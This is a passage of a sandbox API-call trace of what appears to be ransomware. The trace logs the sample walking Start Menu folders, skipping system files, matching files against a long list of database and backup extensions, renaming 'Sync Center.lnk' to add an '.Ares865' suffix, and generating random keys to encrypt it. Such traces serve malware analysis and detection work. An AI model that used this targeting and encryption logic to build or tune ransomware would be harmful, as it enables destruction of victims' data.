returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0068.358] lstrlenW (lpString="nv") returned 2 [0068.358] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0068.358] lstrlenW (lpString="nv2") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0068.358] lstrlenW (lpString="nwdb") returned 4 [0068.358] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0068.358] lstrlenW (lpString="nyf") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0068.358] lstrlenW (lpString="odb") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.358] lstrlenW (lpString="odb") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0068.358] lstrlenW (lpString="oqy") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0068.358] lstrlenW (lpString="ora") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0068.358] lstrlenW (lpString="orx") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0068.359] lstrlenW (lpString="owc") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0068.359] lstrlenW (lpString="p96") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0068.359] lstrlenW (lpString="p97") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0068.359] lstrlenW (lpString="pan") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0068.359] lstrlenW (lpString="pdb") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0068.359] lstrlenW (lpString="pdm") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0068.359] lstrlenW (lpString="pnz") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0068.359] lstrlenW (lpString="qry") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0068.359] lstrlenW (lpString="qvd") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0068.359] lstrlenW (lpString="rbf") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0068.359] lstrlenW (lpString="rctd") returned 4 [0068.359] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0068.359] lstrlenW (lpString="rod") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0068.359] lstrlenW (lpString="rodx") returned 4 [0068.359] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0068.359] lstrlenW (lpString="rpd") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0068.359] lstrlenW (lpString="rsd") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0068.359] lstrlenW (lpString="sas7bdat") returned 8 [0068.359] lstrcmpiW (lpString1="nter.lnk", lpString2="sas7bdat") returned -1 [0068.359] lstrlenW (lpString="sbf") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0068.359] lstrlenW (lpString="scx") returned 3 [0068.359] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0068.359] lstrlenW (lpString="sdb") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0068.360] lstrlenW (lpString="sdc") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0068.360] lstrlenW (lpString="sdf") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0068.360] lstrlenW (lpString="sis") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0068.360] lstrlenW (lpString="spq") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0068.360] lstrlenW (lpString="te") returned 2 [0068.360] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0068.360] lstrlenW (lpString="teacher") returned 7 [0068.360] lstrcmpiW (lpString1="ter.lnk", lpString2="teacher") returned 1 [0068.360] lstrlenW (lpString="tmd") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0068.360] lstrlenW (lpString="tps") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0068.360] lstrlenW (lpString="trc") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.360] lstrlenW (lpString="trc") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0068.360] lstrlenW (lpString="trm") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0068.360] lstrlenW (lpString="udb") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0068.360] lstrlenW (lpString="udl") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0068.360] lstrlenW (lpString="usr") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0068.360] lstrlenW (lpString="v12") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0068.360] lstrlenW (lpString="vis") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0068.360] lstrlenW (lpString="vpd") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0068.360] lstrlenW (lpString="vvv") returned 3 [0068.360] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0068.360] lstrlenW (lpString="wdb") returned 3 [0068.361] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0068.361] lstrlenW (lpString="wmdb") returned 4 [0068.361] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0068.361] lstrlenW (lpString="wrk") returned 3 [0068.361] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0068.361] lstrlenW (lpString="xdb") returned 3 [0068.361] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0068.361] lstrlenW (lpString="xld") returned 3 [0068.361] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0068.361] lstrlenW (lpString="xmlff") returned 5 [0068.361] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0068.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sync Center.lnk.Ares865") returned 74 [0068.361] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sync Center.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sync center.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sync Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sync center.lnk.ares865"), dwFlags=0x1) returned 1 [0068.362] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sync Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sync center.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0068.362] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1254) returned 1 [0068.362] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0068.363] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.363] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.364] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.366] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.366] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.366] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x120 [0068.369] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0068.370] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.371] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.371] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.371] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0068.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0068.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.372] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.372] CloseHandle (hObject=0x120) returned 1 [0068.372] CloseHandle (hObject=0x154) returned 1 [0068.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.372] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0068.372] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4bbf1b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbf1b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0068.372] lstrcmpiW (lpString1="System Tools", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.372] lstrcmpiW (lpString1="System Tools", lpString2="aoldtz.exe") returned 1 [0068.372] lstrcmpiW (lpString1="System Tools", lpString2=".") returned 1 [0068.372] lstrcmpiW (lpString1="System Tools", lpString2="..") returned 1 [0068.372] lstrcmpiW (lpString1="System Tools", lpString2="windows") returned -1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="bootmgr") returned 1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="temp") returned -1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="pagefile.sys") returned 1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="boot") returned 1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="ids.txt") returned 1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="ntuser.dat") returned 1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="perflogs") returned 1 [0068.373] lstrcmpiW (lpString1="System Tools", lpString2="MSBuild") returned 1 [0068.373] lstrlenW (lpString="System Tools") returned 12 [0068.373] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sync Center.lnk") returned 66 [0068.373] lstrcpyW (in: lpString1=0x2cce466, lpString2="System Tools" | out: lpString1="System Tools") returned="System Tools" [0068.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0068.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0380 [0068.373] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0068.373] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4bbf1b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bbf1b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tablet PC", cAlternateFileName="TABLET~1")) returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="aoldtz.exe") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2=".") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="..") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="windows") returned -1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="bootmgr") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="temp") returned -1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="pagefile.sys") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="boot") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="ids.txt") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="ntuser.dat") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="perflogs") returned 1 [0068.373] lstrcmpiW (lpString1="Tablet PC", lpString2="MSBuild") returned 1 [0068.373] lstrlenW (lpString="Tablet PC") returned 9 [0068.373] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\System Tools") returned 63 [0068.373] lstrcpyW (in: lpString1=0x2cce466, lpString2="Tablet PC" | out: lpString1="Tablet PC") returned="Tablet PC" [0068.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0068.373] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7a) returned 0x2f00d8 [0068.373] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0068.373] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b13a6d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x8b13a6d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8b13a6d0, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x62b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Welcome Center.lnk", cAlternateFileName="WELCOM~1.LNK")) returned 1 [0068.373] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.373] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="aoldtz.exe") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2=".") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="..") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="windows") returned -1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="bootmgr") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="temp") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="pagefile.sys") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="boot") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="ids.txt") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="ntuser.dat") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="perflogs") returned 1 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2="MSBuild") returned 1 [0068.374] lstrlenW (lpString="Welcome Center.lnk") returned 18 [0068.374] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Tablet PC") returned 60 [0068.374] lstrcpyW (in: lpString1=0x2cce466, lpString2="Welcome Center.lnk" | out: lpString1="Welcome Center.lnk") returned="Welcome Center.lnk" [0068.374] lstrlenW (lpString="Welcome Center.lnk") returned 18 [0068.374] lstrlenW (lpString="Ares865") returned 7 [0068.374] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0068.374] lstrlenW (lpString=".dll") returned 4 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2=".dll") returned 1 [0068.374] lstrlenW (lpString=".lnk") returned 4 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2=".lnk") returned 1 [0068.374] lstrlenW (lpString=".ini") returned 4 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2=".ini") returned 1 [0068.374] lstrlenW (lpString=".sys") returned 4 [0068.374] lstrcmpiW (lpString1="Welcome Center.lnk", lpString2=".sys") returned 1 [0068.374] lstrlenW (lpString="Welcome Center.lnk") returned 18 [0068.374] lstrlenW (lpString="bak") returned 3 [0068.374] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0068.374] lstrlenW (lpString="ba_") returned 3 [0068.374] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0068.374] lstrlenW (lpString="dbb") returned 3 [0068.374] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0068.374] lstrlenW (lpString="vmdk") returned 4 [0068.374] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0068.374] lstrlenW (lpString="rar") returned 3 [0068.374] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0068.374] lstrlenW (lpString="zip") returned 3 [0068.374] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0068.375] lstrlenW (lpString="tgz") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0068.375] lstrlenW (lpString="vbox") returned 4 [0068.375] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0068.375] lstrlenW (lpString="vdi") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0068.375] lstrlenW (lpString="vhd") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0068.375] lstrlenW (lpString="vhdx") returned 4 [0068.375] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0068.375] lstrlenW (lpString="avhd") returned 4 [0068.375] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0068.375] lstrlenW (lpString="db") returned 2 [0068.375] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0068.375] lstrlenW (lpString="db2") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0068.375] lstrlenW (lpString="db3") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0068.375] lstrlenW (lpString="dbf") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0068.375] lstrlenW (lpString="mdf") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0068.375] lstrlenW (lpString="mdb") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0068.375] lstrlenW (lpString="sql") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0068.375] lstrlenW (lpString="sqlite") returned 6 [0068.375] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0068.375] lstrlenW (lpString="sqlite3") returned 7 [0068.375] lstrcmpiW (lpString1="ter.lnk", lpString2="sqlite3") returned 1 [0068.375] lstrlenW (lpString="sqlitedb") returned 8 [0068.375] lstrcmpiW (lpString1="nter.lnk", lpString2="sqlitedb") returned -1 [0068.375] lstrlenW (lpString="xml") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0068.375] lstrlenW (lpString="$er") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0068.375] lstrlenW (lpString="4dd") returned 3 [0068.375] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0068.376] lstrlenW (lpString="4dl") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0068.376] lstrlenW (lpString="^^^") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0068.376] lstrlenW (lpString="abs") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0068.376] lstrlenW (lpString="abx") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0068.376] lstrlenW (lpString="accdb") returned 5 [0068.376] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0068.376] lstrlenW (lpString="accdc") returned 5 [0068.376] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0068.376] lstrlenW (lpString="accde") returned 5 [0068.376] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0068.376] lstrlenW (lpString="accdr") returned 5 [0068.376] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0068.376] lstrlenW (lpString="accdt") returned 5 [0068.376] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0068.376] lstrlenW (lpString="accdw") returned 5 [0068.376] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0068.376] lstrlenW (lpString="accft") returned 5 [0068.376] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0068.376] lstrlenW (lpString="adb") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.376] lstrlenW (lpString="adb") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.376] lstrlenW (lpString="ade") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0068.376] lstrlenW (lpString="adf") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0068.376] lstrlenW (lpString="adn") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0068.376] lstrlenW (lpString="adp") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0068.376] lstrlenW (lpString="alf") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0068.376] lstrlenW (lpString="ask") returned 3 [0068.376] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0068.376] lstrlenW (lpString="btr") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0068.377] lstrlenW (lpString="cat") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0068.377] lstrlenW (lpString="cdb") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0068.377] lstrlenW (lpString="ckp") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0068.377] lstrlenW (lpString="cma") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0068.377] lstrlenW (lpString="cpd") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0068.377] lstrlenW (lpString="dacpac") returned 6 [0068.377] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0068.377] lstrlenW (lpString="dad") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0068.377] lstrlenW (lpString="dadiagrams") returned 10 [0068.377] lstrcmpiW (lpString1="Center.lnk", lpString2="dadiagrams") returned -1 [0068.377] lstrlenW (lpString="daschema") returned 8 [0068.377] lstrcmpiW (lpString1="nter.lnk", lpString2="daschema") returned 1 [0068.377] lstrlenW (lpString="db-journal") returned 10 [0068.377] lstrcmpiW (lpString1="Center.lnk", lpString2="db-journal") returned -1 [0068.377] lstrlenW (lpString="db-shm") returned 6 [0068.377] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0068.377] lstrlenW (lpString="db-wal") returned 6 [0068.377] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0068.377] lstrlenW (lpString="dbc") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0068.377] lstrlenW (lpString="dbs") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0068.377] lstrlenW (lpString="dbt") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0068.377] lstrlenW (lpString="dbv") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0068.377] lstrlenW (lpString="dbx") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0068.377] lstrlenW (lpString="dcb") returned 3 [0068.377] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0068.377] lstrlenW (lpString="dct") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0068.378] lstrlenW (lpString="dcx") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0068.378] lstrlenW (lpString="ddl") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0068.378] lstrlenW (lpString="dlis") returned 4 [0068.378] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0068.378] lstrlenW (lpString="dp1") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0068.378] lstrlenW (lpString="dqy") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0068.378] lstrlenW (lpString="dsk") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0068.378] lstrlenW (lpString="dsn") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0068.378] lstrlenW (lpString="dtsx") returned 4 [0068.378] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0068.378] lstrlenW (lpString="dxl") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0068.378] lstrlenW (lpString="eco") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0068.378] lstrlenW (lpString="ecx") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0068.378] lstrlenW (lpString="edb") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0068.378] lstrlenW (lpString="epim") returned 4 [0068.378] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0068.378] lstrlenW (lpString="fcd") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0068.378] lstrlenW (lpString="fdb") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0068.378] lstrlenW (lpString="fic") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0068.378] lstrlenW (lpString="flexolibrary") returned 12 [0068.378] lstrcmpiW (lpString1="e Center.lnk", lpString2="flexolibrary") returned -1 [0068.378] lstrlenW (lpString="fm5") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0068.378] lstrlenW (lpString="fmp") returned 3 [0068.378] lstrcmpiW (lpString1="lnk", 